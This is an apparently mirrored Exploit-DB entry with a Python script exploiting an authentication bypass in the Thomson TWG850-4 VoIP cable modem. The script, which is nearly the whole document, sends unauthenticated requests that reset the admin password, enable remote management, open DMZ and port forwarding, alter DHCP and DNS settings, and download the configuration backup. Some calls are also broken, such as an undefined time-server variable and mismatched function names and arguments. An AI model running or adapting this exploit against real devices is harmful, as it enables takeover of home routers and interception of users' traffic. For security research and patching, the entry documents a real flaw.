Thomson Wireless VoIP Cable Modem – Authentication Bypass

• Exploit Database
• 103 阅读

• 作者： Glafkos Charalambous
  日期： 2012-09-20
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/21417/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149

  # Exploit Title: Thomson Wireless VoIP Cable Modem Auth Bypass # Date: February 22, 2011 # Author(s): Glafkos Charalambous, George Nicolaou # Product: TWG850-4 Wireless VoIP Cable Modem # Software Version: ST9A.01.06 # Severity: High # Other Vulnerabilities: # Unauthenticated Backup File Access, # Plaintext Protocol succeptible to sniffing attacks   import argparse import httplib import urllib import urllib2   def http_post( ip, port, request, params ): headers = { "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language":"en-us;en;q=0.5", "Accept-Encoding":"gzip, deflate", "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive":"115", "Connection":"keep-alive", "Content-type":"application/x-www-form-urlencoded" } con = httplib.HTTPConnection(ip,port) con.request("POST", request, params, headers) response = con.getresponse()   def block_domain( ip, port, host ): http_post( ip,port, "/goform/RgUrlBlock", urllib.urlencode( {"cbDomainBlocking":"0x2","BasicParentalNewKeyword":0, "BasicParentalKeywordAction":0, "BasicParentalDomainList":0, "BasicParentalNewDomain":host,"BasicParentalDomainAction":1} ) ) def block_keyword( ip, port, host ): http_post( ip,port, "/goform/RgUrlBlock", urllib.urlencode( {"cbKeywordBlocking":"0x1", "BasicParentalNewKeyword":host,"BasicParentalKeywordAction":1, "BasicParentalNewDomain":"0", "BasicParentralDomainAction":0} ) )   def password_reset( ip, port, user="admin", passwd="admin" ): http_post(ip,port, "/goform/RgSecurity", urllib.urlencode({"HttpUserId":user, "Password":passwd, "PasswordReEnter":passwd, "RestoreFactoryYes":"0x00" }) )   def factory_defaults( ip, port, user="admin", passwd="admin" ): http_post(ip,port, "/goform/RgSecurity", urllib.urlencode({"HttpUserId":user, "Password":passwd, "PasswordReEnter":passwd, "RestoreFactoryYes":"0x01" }) )   def dhcp_config( ip, port, localip="10.1.0.1", localsub="255.255.255.0", leasepoolstart="10.1.0.10", leasepoolend="10.1.0.100" ): http_post(ip,port, "/goform/RgSetup", urllib.urlencode({"LocalIpAddressIP":localip, "LocalSubnetMask":localsub, "DhcpServerEnable":"0x1000", "DhcpLeasePoolStartLAN":leasepoolstart, "DhcpLeasePoolEndLAN":leasepoolend, "LeaseTime":"604800" }) )   def dyn_dns( ip, port, dnsuser="user", dnspass="pass", dnshost="host.dyndns.org" ): http_post(ip,port, "/goform/RgDdns", urllib.urlencode({"DdnsService":1, "DdnsUserName":dnsuser, "DdnsPassword":dnspass, "DdnsHostName":dnshost }) )   def sntp_set( ip, port, server1="clock.via.net", tserver2="ntp.nasa.gov", tserver3="tick.ucla.edu" ): http_post(ip,port, "/goform/RgTime", urllib.urlencode({"TimeSntpEnable":1, "TimeServer1":tserver1, "TimeServer2":tserver2, "TimeServer3":tserver3, "TimeZoneOffsetHrs":0, "TimeZoneOffsetMins":0, "ResetSntpDefaults":0 }) )   def backup_config( ip, port, fName="GatewaySettings.bin" ): u = urllib2.urlopen('http://' + ip+":"+port + '/GatewaySettings.bin') lFile = open(fName, 'w') print "File "+fName+" saved successfully" lFile.write(u.read()) lFile.close()   def remote_manage( ip, port, status ): if status == 'enable': http_post(ip,port, "/goform/RgOptions", urllib.urlencode({"cbIpsecPassThrough":"0x20", "cbPptpPassThrough":"0x40", "cbRemoteManagement":"0x80", "cbOptMulticast": "0x20000", "cbOptUPnP":"0x200000", "cbOptNatSipAlg":"0x89"}) ) elif status == 'disable': http_post(ip,port, "/goform/RgOptions", urllib.urlencode({"cbIpsecPassThrough":"0x20", "cbPptpPassThrough":"0x40", "cbOptMulticast": "0x20000", "cbOptUPnP":"0x200000", "cbOptNatSipAlg":"0x89"}) ) else: print "The argument you specified is not accepted"   def dmz_set( ip, port, dmzhost ): http_post(ip,port, "/goform/RgDmzHost", urllib.urlencode({"DmzHostIP3":dmzhost}) )   def port_forward( ip, port, localip, startport, endport ): http_post(ip,port, "/goform/RgForwarding", urllib.urlencode({"PortForwardAddressLocal1IP3":localip, "PortForwardPortGlobalStart1":startport , "PortForwardPortGlobalEnd1":endport , "PortForwardProtocol1":"254", "PortForwardEnable1":"0x01"}) )   def main(): status = ['enable', 'disable'] argp = argparse.ArgumentParser(description='Thomson Cable Modem Auth Bypass v0.1') argp.add_argument("-pr", "--password_reset", nargs=2, help="Reset Admin Account", metavar=("user","pass")) argp.add_argument("-fd", "--factory_default", nargs=2, help="Reset Factory Defaults", metavar=("user","pass")) argp.add_argument("-bk", "--block_keyword", help="Block Web Access based on Keyword(s)", metavar="keywrd1,keywrd2,...,keywrdN") argp.add_argument("-bd", "--block_domain", help="Block Web Access to Specific Domain(s)",metavar="domain1,domain2,...,domainN") argp.add_argument("-dc", "--dhcp_config", nargs=4, help="Configure DHCP Settings",metavar=("localip","localsub","leasepoolstart", "leasepoolend")) argp.add_argument("-dd", "--dyn_dns", nargs=3, help="Configure Dynamic DNS",metavar=("user", "pass", "host")) argp.add_argument("-ss", "--sntp_set", nargs=3, help="Configure SNTP Settings",metavar=("timeserver1", "timeserver2", "timeserver3")) argp.add_argument("-bg", "--backup_config", help="Download Backup Configuration", metavar=("filename")) argp.add_argument("-rm", "--remote_manage", help="Enable Remote Config Management", metavar=("enable/disable")) argp.add_argument("-ds", "--dmz_set", help="Set DMZ Host. Use last 3 digits for IP Address", metavar=("ip")) argp.add_argument("-pf", "--port_forward", nargs=3, help="Configure Port Forwarding", metavar=("ip", "startport", "endport")) argp.add_argument("IP", help="IP Address") argp.add_argument("PORT", help="Port Number") args = argp.parse_args() if(args.password_reset != None): password_reset( args.IP, args.password_reset[0], args.password_reset[1] ) if(args.factory_default != None): factory_default( args.IP, args.factory_default[0], args.factory_default[1] ) if(args.block_keyword != None): for keyword in args.block_keyword.split(","): block_keyword(args.IP, keyword) if(args.block_domain != None): for domain in args.block_domain.split(","): block_domain( args.IP, domain ) if(args.dhcp_config != None): dhcp_config( args.IP, args.dhcp_config[0], args.dhcp_config[1], args.dhcp_config[2], args.dhcp_config[3] ) if(args.dyn_dns != None): dyn_dns( args.IP, args.dyn_dns[0], args.dyn_dns[1], args.dyn_dns[2] ) if(args.sntp_set != None): sntp_set( args.IP, args.sntp_set[0], args.sntp_set[1], args.sntp_set[2] ) if(args.backup_config != None): backup_config( args.IP, args.backup_config ) if(args.remote_manage != None): remote_manage( args.IP, args.PORT, args.remote_manage ) if(args.dmz_set != None): dmz_set( args.IP, args.PORT, int( args.dmz_set )) if(args.port_forward != None): port_forward( args.IP, args.PORT, args.port_forward[0], args.port_forward[1], args.port_forward[2] ) if __name__ == "__main__": main()